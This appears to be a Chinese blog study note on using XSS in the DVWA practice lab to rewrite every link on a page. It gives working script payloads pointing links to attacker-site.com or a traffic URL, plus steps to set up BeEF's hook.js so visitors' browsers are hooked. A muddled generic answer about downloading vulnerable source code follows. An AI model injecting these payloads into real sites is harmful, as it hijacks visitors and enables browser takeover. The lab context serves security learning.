XSS篡改网页链接学习记录


JS代码讲解

window.onload 当窗口加载时,执行匿名函数。

使用for循环遍历所有获得的链接a标签。

<script>
window.onload = function(){
var link=document.getElementsByTagName("a");
 //获取a标签,由于页面不一定只有一个a标签,link也可是个数组
for(j=0;j<link.length;j++){
link[j].href="http://attacker-site.com/";}//替换为其他URL
}

</script>


XSS篡改链接

将篡改代码注入到对应的xss位置,以dvwa的反射型xss为例。
在这里插入图片描述
在url中注入一个payload

<script>
window.onload = function(){
var link=document.getElementsByTagName("a");
for(j=0;j<link.length;j++){
link[j].href="http://attacker-site.com/";}
}

</script>

结果如下👇
在这里插入图片描述
如果将上述代码存储到存储型xss里边那么,这些链接都会被替换掉。有极大的危害性。


篡改链接指向流量URL

重复上述操作


<script>
window.onload = function(){
var link=document.getElementsByTagName("a");
for(j=0;j<link.length;j++){
link[j].href="https://www.baidu.com";}//url为需要刷流量的url,以百度为例
}

</script>

这样点击任何链接都会转向被设定的url

以百度为例
在这里插入图片描述
这里就提醒一下,遇到不明网站的链接不要乱点。


篡改链接指向恶意URL

在kali里使用beef 来进行恶意链接的生成,利用hook.js执行其他命令

kali若没有的话,安装命令:
apt install beef-xss
出现部分内容未安装的情况运行下列命令
apt-get update
apt install beef-xss --fix-missing

--------------------------------------------------------------
//systemctl start beef-xss.service  #开启beef 
//systemctl stop beef-xss.service     #关闭beef 
//systemctl restart beef-xss.service  #重启beef

安装完成后在终端输入👇
beef-xss
接着会让你设置一个密码(初始用户名为beef

启动服务后,开启apache
进入到/var/www/html文件夹下查看index.html中的

<script src="http://ip:端口/hook.js"></script> 
//修改ip为虚拟机的ip并保存

接下来在反射型xss界面get提交

<script>
window.onload = function(){
var link=document.getElementsByTagName("a");
for(j=0;j<link.length;j++){
link[j].href="上边的ip/index.html";}
}

</script>

然后去访问这个链接
就可以在kali中的beef的网页中左栏会出现访问那个url的ip
类似这样👇 可以看到对应的信息以及一些可以执行的命令
在这里插入图片描述


  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
对于下载含有XSS漏洞的网页源码,首先要明确XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过注入恶意脚本代码,使用户在浏览网页时受到攻击。 为了下载含有XSS漏洞的网页源码,我们可以按照以下步骤操作: 1. 确定目标网页:首先,需要明确要下载的网页具有XSS漏洞。通常,这需要通过漏洞扫描工具或者手动分析目标网站的源码来判断。 2. 搭建测试环境:为了避免网站的实际访问影响到我们的操作,我们可以搭建本地测试环境。使用Web服务器软件(如Apache、Nginx等)和相应的网页源码托管目录,搭建一个本地网站。 3. 复制目标网页:在搭建的本地测试环境中,通过浏览器访问目标网页,并将其完整的HTML源码复制下来。 4. 编辑源码:使用文本编辑器打开复制的HTML源码文件,并进行相关修改。由于涉及到安全漏洞,建议仅用于学习、研究和测试目的,并遵守法律法规。 5. 保存并访问:保存修改后的源码文件,并重新启动搭建的本地测试环境。通过浏览器访问本地测试环境中的网页,即可下载含有XSS漏洞的网页源码。 需要提醒的是,下载、分析和利用网页源码是一个需谨慎对待的行为。未经授权或滥用此技术可能会导致法律责任。因此,在进行任何相关活动之前,请确保了解相关法律法规,并获得相关授权和许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值